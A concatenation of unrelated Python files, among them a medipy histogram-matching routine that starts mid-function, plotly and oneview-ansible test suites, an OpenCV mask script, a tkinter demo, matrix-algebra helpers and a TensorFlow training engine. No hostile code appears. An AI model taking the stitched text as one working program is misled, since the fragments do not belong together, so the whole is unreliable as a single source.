moving_itk = medipy.itk.medipy_image_to_itk_image(moving, False) mask_itk = None if mask: mask_itk = medipy.itk.medipy_image_to_itk_image(mask, False) ################################## # 1. Compute the joint histogram # ################################## histogram_calculator = itk.JointHistogramCalculator[ moving_itk, mask_itk or moving_itk].New( Image1=moving_itk, Image2=fixed_itk, BinsCount1=bins_count_moving, BinsCount2=bins_count_fixed) if mask: histogram_calculator.SetMask(mask_itk) # FIXME: should be in ctor if method == "Nearest Neighbor": histogram_calculator.SetMethodToNearestNeighbor() elif method == "Linear": histogram_calculator.SetMethodToLinearInterpolation() histogram_calculator.Compute() histogram = histogram_calculator.GetHistogram() #################################### # 2. Compute the transfer function # #################################### transfer_function_calculator = itk.JointHistogramTransferFunctionCalculator[ histogram].New( Histogram=histogram, ResampleFactor=10 ) transfer_function_calculator.Compute() transfer_function = transfer_function_calculator.GetTransferFunction() ######################################## # 3. 
Adjust the moving image intensity # ######################################## transform_intensity = itk.TransformIntensityImageFilter[ moving_itk, moving_itk].New( Input=moving_itk, TransferFunction=transfer_function) output_itk = transform_intensity()[0] output = medipy.itk.itk_image_to_medipy_image(output_itk, None, True) return output x = 1 #x = 1.2 #x = 1.2e5 #x = 1.2e+5 #x = 1.2e-5 x = () x = (1,) x = (1,2) x = ('a',None,3) from .base import SharedMemory __all__ = ["SharedMemory"] testcases = [ { 'input': { "string": "clementisacap" }, 'output': 'mentisac', }, ] from lib import run_tests def main(): run_tests( testcases=testcases, function=longestSubstringWithoutDuplication, ) def longestSubstringWithoutDuplication(string): cached = {} ret = '' pt = 0 for i, s in enumerate(string): if s in cached: if cached[s] < pt: cached[s] = i else: pt = max(cached[s] + 1, pt + 1) cached[s] = i if (i - pt + 1) > len(ret): ret = string[pt:i + 1] return ret import pytest import numpy as np from ...core import Data, DataCollection from ...qt.glue_application import GlueApplication from ...qt.widgets import ScatterWidget, ImageWidget, HistogramWidget from ..export_plotly import build_plotly_call try: import plotly PLOTLY_INSTALLED = True except ImportError: PLOTLY_INSTALLED = False pytest.mark.skipif('not PLOTLY_INSTALLED') class TestPlotly(object): def setup_method(self, method): d = Data(x=[1, 2, 3], y=[2, 3, 4], label='data') dc = DataCollection([d]) self.app = GlueApplication(dc) self.data = d def test_scatter(self): app = self.app d = self.data d.style.markersize = 6 d.style.color = '#ff0000' d.style.alpha = .4 v = app.new_data_viewer(ScatterWidget, data=d) v.xatt = d.id['y'] v.yatt = d.id['x'] args, kwargs = build_plotly_call(app) expected = dict(type='scatter', mode='markers', name=d.label, marker=dict(size=6, color='rgba(255, 0, 0, 0.4)', symbol='circle')) for k, v in expected.items(): assert args[0][k] == v np.testing.assert_array_equal(args[0]['x'], d['y']) np.testing.assert_array_equal(args[0]['y'], d['x']) assert 'layout' in kwargs layout = kwargs['layout'] assert layout['showlegend'] def test_scatter_subset(self): app = self.app d = self.data s = d.new_subset(label='subset') s.subset_state = d.id['x'] > 1 s.style.marker = 's' v = app.new_data_viewer(ScatterWidget, data=d) v.xatt = d.id['x'] v.yatt = d.id['x'] args, kwargs = build_plotly_call(app) # check that subset is on Top assert len(args) == 2 assert args[0]['name'] == 'data' assert args[1]['name'] == 'subset' def test_axes(self): app = self.app v = app.new_data_viewer(ScatterWidget, data=self.data) v.xlog = True v.xmin = 10 v.xmax = 100 v.ylog = False v.ymin = 2 v.ymax = 4 args, kwargs = build_plotly_call(app) xaxis = dict(type='log', rangemode='normal', range=[1, 2], title='y', zeroline=False) yaxis = dict(type='linear', rangemode='normal', range=[2, 4], title='x', zeroline=False) layout = kwargs['layout'] assert layout['xaxis'] == xaxis assert layout['yaxis'] == yaxis def test_histogram(self): app = self.app d = self.data d.style.color = '#000000' v = app.new_data_viewer(HistogramWidget, data=d) v.component = d.id['y'] v.xmin = 0 v.xmax = 10 v.bins = 20 args, kwargs = build_plotly_call(app) expected = dict( name='data', type='bar', marker=dict( color='rgba(0, 0, 0, 0.5)' ), ) for k in expected: assert expected[k] == args[0][k] assert kwargs['layout']['barmode'] == 'overlay' def test_2plot(self): app = self.app d = self.data v = app.new_data_viewer(HistogramWidget, data=d) v2 = app.new_data_viewer(ScatterWidget, data=d) args, kwargs = 
build_plotly_call(app) assert len(args) == 2 assert 'xaxis' not in args[0] and 'yaxis' not in args[0] assert args[1]['xaxis'] == 'x2' assert args[1]['yaxis'] == 'y2' layout = kwargs['layout'] assert layout['xaxis']['domain'] == [0, .45] assert layout['xaxis2']['domain'] == [.55, 1] assert layout['yaxis2']['anchor'] == 'x2' def test_can_multiplot(self): # check that no errors are raised with 2-4 plots app = self.app d = self.data for i in range(2, 5): app.new_data_viewer(HistogramWidget, data=d) args, kwargs = build_plotly_call(app) def test_4plot(self): app = self.app d = self.data v = [app.new_data_viewer(HistogramWidget, data=d) for _ in range(4)] args, kwargs = build_plotly_call(app) assert len(args) == 4 assert 'xaxis' not in args[0] and 'yaxis' not in args[0] assert args[1]['xaxis'] == 'x2' assert args[1]['yaxis'] == 'y2' assert args[2]['xaxis'] == 'x3' assert args[2]['yaxis'] == 'y3' assert args[3]['xaxis'] == 'x4' assert args[3]['yaxis'] == 'y4' layout = kwargs['layout'] assert layout['xaxis']['domain'] == [0, .45] assert layout['yaxis']['domain'] == [0, .45] assert layout['xaxis2']['domain'] == [.55, 1] assert layout['yaxis2']['domain'] == [0, 0.45] assert layout['yaxis2']['anchor'] == 'x2' assert layout['xaxis3']['domain'] == [0, 0.45] assert layout['xaxis3']['anchor'] == 'y3' assert layout['yaxis3']['domain'] == [0.55, 1] assert layout['xaxis4']['anchor'] == 'y4' assert layout['yaxis4']['domain'] == [0.55, 1] assert layout['yaxis4']['anchor'] == 'x4' import platform import unittest @unittest.skipIf(platform.system() != 'Windows', 'Windows only tests') class WindowsTestCase(unittest.TestCase): def test_windows_path_sanity(self): ''' This test case is a no-op, and exists only to ensure that windows paths work as part of the windows sanity ci test. ''' print('sanity passed - test was run') def test_mslex_install(self): '''Ensure that mslex is installed on Windows''' try: import mslex # type: ignore # pylint: disable=W0611,C0415 except ImportError: self.fail('Unable to import mslex') def test_mslex_import(self): '''Ensure that mslex is used as shlex''' from taskipy.task_runner import shlex # pylint: disable=C0415 self.assertEqual(shlex.__name__, 'mslex') LaudateCorpus1/oneview-ansible #!/usr/bin/python # -*- coding: utf-8 -*- ### # Copyright (2021) Hewlett Packard Enterprise Development LP # # Licensed under the Apache License, Version 2.0 (the "License"); # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
### import mock import pytest from hpe_test_utils import OneViewBaseTest from oneview_module_loader import IdPoolsIpv4SubnetModule FAKE_MSG_ERROR = 'Fake message error' DEFAULT_SUBNET_TEMPLATE = dict( name='Ipv4Subnet', uri='/rest/subnet/test', type='Subnet', networkId='10.1.0.0', domain='example.com' ) PARAMS_FOR_PRESENT = dict( config='config.json', state='present', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId']) ) PARAMS_FOR_PRESENT_WITH_URI = dict( config='config.json', state='present', data=dict(uri=DEFAULT_SUBNET_TEMPLATE['uri']) ) PARAMS_FOR_INVALID = dict( config='config.json', state='present', data=dict(type=DEFAULT_SUBNET_TEMPLATE['type']) ) PARAMS_WITH_CHANGES = dict( config='config.json', state='present', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId'], domain='newdomain.com') ) PARAMS_FOR_ABSENT = dict( config='config.json', state='absent', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId']) ) PARAMS_FOR_COLLECT = dict( config='config.json', state='collect', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId'], idList=['10.1.1.1', '10.1.1.2']) ) PARAMS_FOR_ALLOCATE = dict( config='config.json', state='allocate', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId'], count=2) ) @pytest.mark.resource(TestIdPoolsIpv4SubnetModule='id_pools_ipv4_subnets') class TestIdPoolsIpv4SubnetModule(OneViewBaseTest): """ OneViewBaseTestCase provides the mocks used in this test case """ def test_should_create_new_id_pools_ipv4_subnet(self): self.resource.get_by_field.return_value = None self.resource.create.return_value = self.resource self.resource.data = DEFAULT_SUBNET_TEMPLATE self.mock_ansible_module.params = PARAMS_FOR_PRESENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_CREATED, ansible_facts=dict(id_pools_ipv4_subnet=DEFAULT_SUBNET_TEMPLATE) ) def test_should_not_update_when_data_is_equals(self): self.resource.data = DEFAULT_SUBNET_TEMPLATE self.resource.get_by_field.return_value = self.resource self.mock_ansible_module.params = PARAMS_FOR_PRESENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=False, msg=IdPoolsIpv4SubnetModule.MSG_ALREADY_PRESENT, ansible_facts=dict(id_pools_ipv4_subnet=DEFAULT_SUBNET_TEMPLATE) ) def test_should_get_the_same_resource_by_networkid(self): self.resource.data = DEFAULT_SUBNET_TEMPLATE self.resource.get_by_field.return_value = self.resource self.mock_ansible_module.params = PARAMS_FOR_PRESENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=False, msg=IdPoolsIpv4SubnetModule.MSG_ALREADY_PRESENT, ansible_facts=dict(id_pools_ipv4_subnet=DEFAULT_SUBNET_TEMPLATE) ) def test_should_get_the_same_resource_by_uri(self): self.resource.data = DEFAULT_SUBNET_TEMPLATE self.resource.get_by_uri.return_value = self.resource self.mock_ansible_module.params = PARAMS_FOR_PRESENT_WITH_URI IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=False, msg=IdPoolsIpv4SubnetModule.MSG_ALREADY_PRESENT, ansible_facts=dict(id_pools_ipv4_subnet=DEFAULT_SUBNET_TEMPLATE) ) def test_update_when_data_has_modified_attributes(self): data_merged = DEFAULT_SUBNET_TEMPLATE.copy() data_merged['domain'] = 'diffdomain.com' self.resource.data = data_merged self.resource.get_by_field.return_value = self.resource self.resource.update.return_value = data_merged self.mock_ansible_module.params = PARAMS_WITH_CHANGES 
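        # The OneViewBaseTest fixture mocks the OneView client, so get_by_field
        # returns an existing subnet whose domain ('diffdomain.com') differs from
        # the requested 'newdomain.com'; run() is therefore expected to update
        # the resource and exit with MSG_UPDATED and changed=True.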
IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_UPDATED, ansible_facts=dict(id_pools_ipv4_subnet=data_merged) ) def test_should_allocate_when_valid_ids_present(self): data_merged = DEFAULT_SUBNET_TEMPLATE.copy() data_merged['count'] = 2 data_merged['allocatorUri'] = '/rest/fake' self.resource.data = data_merged self.resource.get_by_field.return_value = self.resource self.resource.allocate.return_value = {'idList': ['172.16.31.10', '172.16.31.10']} self.mock_ansible_module.params = PARAMS_FOR_ALLOCATE IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_ALLOCATE, ansible_facts=dict(id_pools_ipv4_subnet={'idList': ['172.16.31.10', '172.16.31.10']}) ) def test_should_collect_when_valid_ids_allocated(self): data_merged = DEFAULT_SUBNET_TEMPLATE.copy() data_merged['idList'] = ['10.1.1.1', '10.1.1.2'] data_merged['allocatorUri'] = '/rest/fake' self.resource.data = data_merged self.resource.get_by_field.return_value = self.resource self.resource.collect.return_value = {'idList': ['10.1.1.1', '10.1.1.1']} self.mock_ansible_module.params = PARAMS_FOR_COLLECT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_COLLECT, ansible_facts=dict(id_pools_ipv4_subnet={'idList': ['10.1.1.1', '10.1.1.1']}) ) def test_should_remove_id_pools_ipv4_subnet(self): self.resource.data = DEFAULT_SUBNET_TEMPLATE self.resource.get_by_field.return_value = self.resource self.mock_ansible_module.params = PARAMS_FOR_ABSENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_DELETED ) def test_should_do_nothing_when_id_pools_ipv4_subnet_not_exist(self): self.resource.get_by_field.return_value = None self.mock_ansible_module.params = PARAMS_FOR_ABSENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=False, msg=IdPoolsIpv4SubnetModule.MSG_ALREADY_ABSENT ) if __name__ == '__main__': pytest.main([__file__]) import os import cv2 import numpy as np import shutil ###########################Display image################################################################## def show(Im,Name="img"): cv2.imshow(Name,Im.astype(np.uint8)) cv2.waitKey() cv2.destroyAllWindows() ################################################################################################################################################################## #Split binary mask correspond to a singele segment into connected components def GetConnectedSegment(Seg): [NumCCmp, CCmpMask, CCompBB, CCmpCntr] = cv2.connectedComponentsWithStats(Seg.astype(np.uint8)) # apply connected component Mask=np.zeros([NumCCmp,Seg.shape[0],Seg.shape[1]],dtype=bool) BBox=np.zeros([NumCCmp,4]) Sz=np.zeros([NumCCmp],np.uint32) for i in range(1,NumCCmp): Mask[i-1] = (CCmpMask == i) BBox[i-1] = CCompBB[i][:4] Sz[i-1] = CCompBB[i][4] #segment Size return Mask,BBox,Sz,NumCCmp-1 ############################################################################################################################ ############################################################################################## MainDir=r"C:\Users\Sagi\Desktop\CHEMSCAPE\ChemLabScapeDataset\TestAnnoatations\\" for AnnDir in os.listdir(MainDir): VesDir = MainDir + "/" + AnnDir + r"//Vessel//" SemDir = MainDir + "/" + AnnDir + 
r"//Semantic//" EmptyDir = MainDir + "/" + AnnDir + r"//EmptyRegions//" Img = cv2.imread(MainDir +"/"+ AnnDir + "/Image.png") if os.path.isdir(EmptyDir): shutil.rmtree(EmptyDir) os.mkdir(EmptyDir) #___________________________________________________________________________________________________________________ NumEmptyInst=0 IsFilled=False IsVapor=False if os.path.exists(SemDir+"16_Filled.png"): Filled=cv2.imread(SemDir+"16_Filled.png")[:,:,0]>0 IsFilled = True if os.path.exists(SemDir+"14_Vapor"): Vapor=cv2.imread(SemDir+"14_Vapor.png")[:,:,0]>0 IsVapor = True for Name in os.listdir(VesDir): path=VesDir+Name if not os.path.exists(path): continue Ves=cv2.imread(path) Ves[:,:,1]*=0 if not 7 in Ves: Ves[:,:,2]*=0 cv2.imwrite(path,Ves) print(path) # show(Ves*30) Ves[:, :, 1]=Ves[:, :, 0] Mask=Ves[:, :, 0]>0 if IsFilled: Mask[Filled]=0 if IsVapor: Mask[Vapor]=0 # show((Img/2+Ves*100).astype(np.uint8)) #show(Ves * 100, str(NumEmptyInst)+"ALL VESSEL") Mask,BBox,Sz,NumCCmp=GetConnectedSegment(Mask.astype(np.uint8)) for i in range(NumCCmp): if Mask[i].sum()<1200: continue Inst=Ves.copy() Inst[:, :, 0]=Inst[:, :, 1]*Mask[i] # NumEmptyInst+=1 cv2.imwrite(EmptyDir+"//"+str(NumEmptyInst)+".png",Inst) # show(Inst[:,:,0]*30,str(NumEmptyInst)) # if 7 in Ves: # print("444") # show(Ves*20) # show((Ves==7).astype(np.uint8)*100) import tkinter from tkinter import messagebox # Basic Frame class Application(tkinter.Frame): def __init__(self, master=None): super().__init__(master) self.pack() self.create_widgets() def create_widgets(self): self.hi = tkinter.Button(self) # Define A button self.hi["text"] = "Say Hello" self.hi["command"] = self.say_hi self.hi.pack(side="top") self.quit = tkinter.Button(self, text="QUIT", fg="red", command=root.destroy) # define button self.quit.pack(side="bottom") def say_hi(self): print("They said hello!") messagebox.showinfo("Info","Hello!") root = tkinter.Tk() app = Application(master=root) app.mainloop() 0 import os class Config: SECRET_KEY = "testkey" SQLALCHEMY_TRACK_MODIFICATIONS = False LOG_FILE = "api.log" class DevelopmentConfig(Config): SQLALCHEMY_DATABASE_URI = "postgresql://testusr:password@127.0.0.1:5432/testdb" # SQLALCHEMY_DATABASE_URI = 'postgres://127.0.0.1:5432' DEBUG = True class ProductionConfig(Config): SQLALCHEMY_DATABASE_URI = os.environ.get("DATABASE_URL") DEBUG = False class DockerDevConfig(Config): SQLALCHEMY_DATABASE_URI = "postgresql://testusr:password@postgres/testdb" DEBUG = True config = {"dev": DevelopmentConfig, "prod": ProductionConfig, "docker": DockerDevConfig} 0 # -*- coding: utf-8 -*- from openprocurement.api.utils import opresource from openprocurement.api.views.cancellation_document import TenderCancellationDocumentResource as BaseResource @opresource(name='Tender Two Stage Cancellation Documents', collection_path='/tenders/{tender_id}/cancellations/{cancellation_id}/documents', path='/tenders/{tender_id}/cancellations/{cancellation_id}/documents/{document_id}', procurementMethodType='aboveThresholdTS', description="Tender Two Stage cancellation documents") class TenderCancellationDocumentResource(BaseResource): """ Cancellation Document """ arielbello/dota-ladder import os import time import constants as Const def is_first_run() -> bool: return not os.path.exists(Const.Files.APP_LOG) def log_write(log_text): with open(Const.Files.APP_LOG, "a+") as file: file.write(f"{time.ctime()}: {log_text}\n") def create_folder_if_needed(path): if not os.path.exists(path): os.makedirs(path) import copy from lafs.matrix_functions import is_singular, 
is_square import lafs # IMPLEMENT CHECKS FOR RANK/SINGULARITY & SQUARE MATRICES # Returns a row echelon form of the input matrix. def ref(matrix): ret = copy.deepcopy(matrix) k_row, k_col = 0, 0 while k_row < ret.dim(0) and k_col < ret.dim(0): col_abs = [abs(ret(k, k_col)) for k in range(k_row, ret.dim(0))] i_max = k_row + col_abs.index(max(col_abs)) if ret(i_max, k_col) == 0: k_col += 1 else: ret.swap_rows(k_row, i_max) for i in range(k_row + 1, ret.dim(0)): factor = ret(i, k_col) / ret(k_row, k_col) ret[i][k_col] = 0 for j in range(k_col + 1, ret.dim(1)): ret[i][j] = ret(i, j) - ret(k_row, j) * factor k_row += 1 k_col += 1 return ret # Returns the reduced row echelon form of the input matrix. def rref(matrix): ret = copy.deepcopy(matrix) lead = 0 n_row = ret.dim(0) n_col = ret.dim(1) for r in range(n_row): if lead == n_col: return ret i = r while ret(i, lead) == 0: i += 1 if i == n_row: i = r lead += 1 if lead == n_col: return ret if i != r: ret.swap_rows(i, r) div = ret(r, lead) for j in range(ret.dim(1)): ret[r][j] /= div for l in range(n_row): if l != r: factor = ret(l, lead) for j in range(ret.dim(1)): ret[l][j] -= factor * ret(r,j) lead += 1 return ret # Returns the direct inverse via Gaussian elimination of the input matrix. def inv(matrix): if is_singular(matrix): raise ValueError("Input matrix must be invertible.") base_matrix = copy.deepcopy(matrix) ret = copy.deepcopy(matrix.identity()) lead = 0 n_row = base_matrix.dim(0) n_col = base_matrix.dim(1) for r in range(n_row): if lead == n_col: return ret i = r while base_matrix(i, lead) == 0: i += 1 if i == n_row: i = r lead += 1 if lead == n_col: return ret if i != r: base_matrix.swap_rows(i, r) ret.swap_rows(i, r) div = base_matrix(r, lead) for j in range(base_matrix.dim(1)): base_matrix[r][j] /= div ret[r][j] /= div for l in range(n_row): if l != r: factor = base_matrix(l, lead) for j in range(base_matrix.dim(1)): base_matrix[l][j] -= factor * base_matrix(r,j) ret[l][j] -= factor * ret(r,j) lead += 1 return ret # Returns the rank of the input matrix. def rank(matrix): return sum([x[0] != 0 for x in lafs.matrix_functions.diag(rref(matrix))()]) # Returns the nullity of the input matrix. def nullity(matrix): return min(lafs.matrix_functions.dim(matrix)) - rank(matrix) # Returns the solution "x" of the linear system "A * x = b". def linsolve(A, b): return lafs.gauss.inv(A) * b if __name__ == "__main__": pass from django.conf import settings from src.wall.models import Post class Feed: """ Service feeds """ def get_post_list(self, user: settings.AUTH_USER_MODEL): return Post.objects.filter(user__owner__subscriber=user).order_by('-create_date')\ .select_related('user').prefetch_related('comments') def get_single_post(self, pk: int): return Post.objects.select_related('user').prefetch_related('comments').get(id=pk) feed_service = Feed() #!/usr/bin/python # # Project Saturn # _____________________________________________________________________________ # # _.oo. # August 2019 _.u[[/;:,. .odMMMMMM' # .o888UU[[[/;:-. .o@P^ MMM^ # engine.py oN88888UU[[[/;::-. dP^ # main program dNMMNN888UU[[[/;:--. .o@P^ # ,MMMMMMN888UU[[/;::-. o@^ # NNMMMNN888UU[[[/~.o@P^ # 888888888UU[[[/o@^-.. # oI8888UU[[[/o@P^:--.. # .@^ YUU[[[/o@^;::---.. # oMP ^/o@P^;:::---.. # .dMMM .o@^ ^;::---... 
# dMMMMMMM@^` `^^^^ # YMMMUP^ # ^^ # _____________________________________________________________________________ # # # Copyright 2019 # # THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # _____________________________________________________________________________ # ---------------- # import libraries # ---------------- # standard libraries # ----- #import tensorflow as tf import tensorflow.compat.v1 as tf tf.disable_eager_execution() import numpy as np import matplotlib import tfplot import sys import os import re import errno import importlib # from tensorflow.contrib.tensorboard.plugins import projector from tensorboard.plugins import projector # TODO: Integrate class activation map helper into building blocks, # i.e. CAM Module # custom libraries # ----- import utilities.tfevent_handler as tfevent_handler import utilities.tfrecord_handler as tfrecord_handler import utilities.visualizer as visualizer import utilities.helper as helper import utilities.networks.buildingblocks as bb import utilities.networks.preprocessor as preprocessor import utilities.afterburner as afterburner # cross-platform development from platform import system IS_MACOSX = True if system() == 'Darwin' else False PWD_STEM = "/Users/markus/Research/Code/" if IS_MACOSX else "/home/mernst/git/" # commandline arguments # ----- # FLAGS tf.flags.DEFINE_boolean('testrun', False, 'simple configuration on local machine to test') tf.flags.DEFINE_string('config_file', PWD_STEM + #'/Users/markus/Research/Code/' + #'/home/mernst/git/'+ 'saturn/experiments/001_noname_experiment/' + 'files/config_files/config0.csv', 'path to the configuration file of the experiment') tf.flags.DEFINE_string('name', '', 'name of the run, i.e. iteration1') tf.flags.DEFINE_boolean('restore_ckpt', True, 'restore model from last checkpoint') FLAGS = tf.flags.FLAGS CONFIG = helper.infer_additional_parameters( helper.read_config_file(FLAGS.config_file) ) class LearningRate(object): """ LearningRate interits from object. It stores internal variables for learning rate parameters and has tf methods to decay the learning rate or to divide it by 10 """ def __init__(self, lrate, eta, delta, d, global_epoch_variable): super(LearningRate, self).__init__() self.rate = tf.Variable(lrate, trainable=False, name='learning_rate') self.eta = tf.Variable(eta, trainable=False, name='learning_rate_eta') self.delta = tf.Variable(delta, trainable=False, name='learning_rate_delta') self.d = tf.Variable(d, trainable=False, name='learning_rate_d') self.divide_by_10 = tf.assign(self.rate, self.rate / 10, name='divide_by_10') # TODO: initial learning rate should be specified in the setup self.decay_by_epoch = tf.assign( self.rate, self.eta * self.delta ** (tf.cast(global_epoch_variable, tf.float32) / self.d), name='decay_by_epoch') class EmbeddingObject(object): """ EmbeddingObject inherits from object. It stores internal variables for thumbnailsize, thumbnails, labels and embedding and has tf methods to update and reset the embedding at testtime. 
""" def __init__(self, thumbnailsize, image_height, image_width, image_channels, batchsize, network_depth, network, accuracy): super(EmbeddingObject, self).__init__() self.thu_height = thumbnailsize self.thu_width = int(image_width / image_height * 32) self.total = {} update_embedding_preclass = {} reset_embedding_preclass = {} # these shapes are set to cover the standard networks # change for different embedding visualization self.labels = tf.Variable(tf.zeros( shape=0, dtype=tf.int64), validate_shape=False, name="preclass_labels", trainable=False) self.thumbnails = tf.Variable(tf.zeros( shape=[0, self.thu_height, self.thu_height, image_channels], dtype=tf.float32), validate_shape=False, name="embedding_thumbnails", trainable=False) update_embedding_labels = tf.assign(self.labels, tf.concat( [self.labels, tf.argmax(labels.variable, axis=-1)], axis=0), validate_shape=False) update_embedding_thumbnails = tf.assign( self.thumbnails, tf.concat( [self.thumbnails, tf.cast( tf.image.resize_with_crop_or_pad( tf.image.resize( inp.variable, [self.thu_height, self.thu_width]), self.thu_height, self.thu_height), dtype=tf.float32)], axis=0), validate_shape=False) reset_embedding_labels = tf.assign(self.labels, tf.zeros( shape=0, dtype=tf.int64), validate_shape=False) reset_embedding_thumbnails = tf.assign( self.thumbnails, tf.zeros( shape=[0, self.thu_height, self.thu_height, image_channels], dtype=tf.float32), validate_shape=False) # TODO: how to do timesteps here without having accuracy? for time in accuracy.outputs: embedding_tensor = tf.reshape(network.layers["dropoutc{}".format( network_depth - 1)].outputs[time], (batchsize, -1)) self.total[time] = tf.Variable( tf.zeros(shape=[0, tf.shape(embedding_tensor)[-1]], dtype=tf.float32), validate_shape=False, name="preclass_{}".format(time), trainable=False) update_embedding_preclass[time] = tf.assign( self.total[time], tf.concat([self.total[time], embedding_tensor], axis=0), validate_shape=False) reset_embedding_preclass[time] = tf.assign( self.total[time], tf.zeros(shape=[0, tf.shape(embedding_tensor)[-1]], dtype=tf.float32), validate_shape=False) self.update = tf.group(tf.stack( (list(update_embedding_preclass.values()))), update_embedding_labels, update_embedding_thumbnails) self.reset = tf.group(tf.stack( (list(reset_embedding_preclass.values()))), reset_embedding_labels, reset_embedding_thumbnails) class TestAccuracy(object): """ TestAccuracy inherits from object. It provides internal variables for accuracy and loss at different times and tf methods to update and reset during testtime. """ def __init__(self, accuracy, error, label_type, partial_accuracy): super(TestAccuracy, self).__init__() self.count = tf.Variable(0., trainable=False) update_count = tf.assign_add(self.count, 1.) reset_count = tf.assign(self.count, 0.) total_test_accuracy = {} self.total_test_loss = {} update_total_test_accuracy = {} update_total_test_loss = {} reset_total_test_accuracy = {} reset_total_test_loss = {} self.average_accuracy = {} self.average_cross_entropy = {} for time in accuracy.outputs: total_test_accuracy[time] = tf.Variable(0., trainable=False) self.total_test_loss[time] = tf.Variable(0., trainable=False) update_total_test_accuracy[time] = tf.assign_add( total_test_accuracy[time], accuracy.outputs[time]) update_total_test_loss[time] = tf.assign_add( self.total_test_loss[time], error.outputs[time]) reset_total_test_loss[time] = tf.assign( self.total_test_loss[time], 0.) reset_total_test_accuracy[time] = tf.assign( total_test_accuracy[time], 0.) 
self.average_accuracy[time] = \ total_test_accuracy[time] / self.count self.average_cross_entropy[time] = \ self.total_test_loss[time] / self.count update_accloss = tf.stack( (list(update_total_test_loss.values()) + list( update_total_test_accuracy.values()))) reset_accloss = tf.stack( (list(reset_total_test_accuracy.values()) + list( reset_total_test_loss.values()))) if label_type == 'nhot': total_test_partial_accuracy = {} update_total_test_partial_accuracy = {} reset_total_test_partial_accuracy = {} self.average_partial_accuracy = {} for time in partial_accuracy.outputs: total_test_partial_accuracy[time] = tf.Variable( 0., trainable=False) update_total_test_partial_accuracy[time] = \ tf.assign_add( total_test_partial_accuracy[time], partial_accuracy.outputs[time]) reset_total_test_partial_accuracy[time] = tf.assign( total_test_partial_accuracy[time], 0.) self.average_partial_accuracy[time] = \ total_test_partial_accuracy[time] / self.count update_accloss = tf.stack((list(update_total_test_loss.values( )) + list(update_total_test_accuracy.values()) + list(update_total_test_partial_accuracy.values()))) reset_accloss = tf.stack((list(reset_total_test_accuracy.values( )) + list(reset_total_test_loss.values()) + list(reset_total_test_partial_accuracy.values()))) else: self.average_partial_accuracy = self.average_accuracy self.update = tf.group(update_accloss, update_count) self.reset = tf.group(reset_accloss, reset_count) class ConfusionMatrix(object): """ ConfusionMatrix inherits from object. It provides access to the total_confusion_matrix and tf methods to update and reset during testtime. """ def __init__(self, network, labels, classes, time_depth): super(ConfusionMatrix, self).__init__() self.total = tf.Variable( tf.zeros([classes, classes]), name="confusion_matrix", trainable=False) update_confusion_matrix = tf.assign_add( self.total, tf.matmul(tf.transpose( tf.one_hot(tf.argmax( network.outputs[time_depth], 1), classes)), labels.outputs[time_depth])) reset_confusion_matrix = tf.assign( self.total, tf.zeros([classes, classes])) self.update = tf.group(update_confusion_matrix) self.reset = tf.group(reset_confusion_matrix) # constants # ----- INP_MIN = -1 INP_MAX = 1 DTYPE = tf.float32 # TODO fill this into the infer_additional_parameters # use sigmoid for n-hot task, otherwise softmax # define network io modules # ----- circuit = importlib.import_module(CONFIG['network_module']) inp = bb.NontrainableVariableModule("input", (CONFIG['batchsize'], CONFIG['image_height_input'], CONFIG['image_width_input'], CONFIG['image_channels']), dtype=DTYPE) labels = bb.NontrainableVariableModule("input_labels", (CONFIG['batchsize'], CONFIG['classes']), dtype=DTYPE) keep_prob = bb.PlaceholderModule( "keep_prob", shape=(), dtype=DTYPE) is_training = bb.PlaceholderModule( "is_training", shape=(), dtype=tf.bool) # TODO: This could be one class that can be incremented and maybe even account # for batch accuracy. 
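# A minimal sketch (hypothetical, never instantiated below) of the counter class
# the TODO above suggests: it bundles a non-trainable variable with its own
# increment op, which is the pattern the global_step/global_epoch pairs below
# implement by hand.
class _CounterSketch(object):
    """Illustrative only: a step/epoch counter and its increment op."""

    def __init__(self, name):
        self.value = tf.Variable(0, trainable=False, name=name)
        self.increment = tf.assign_add(self.value, 1,
                                       name='increment_{}'.format(name))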
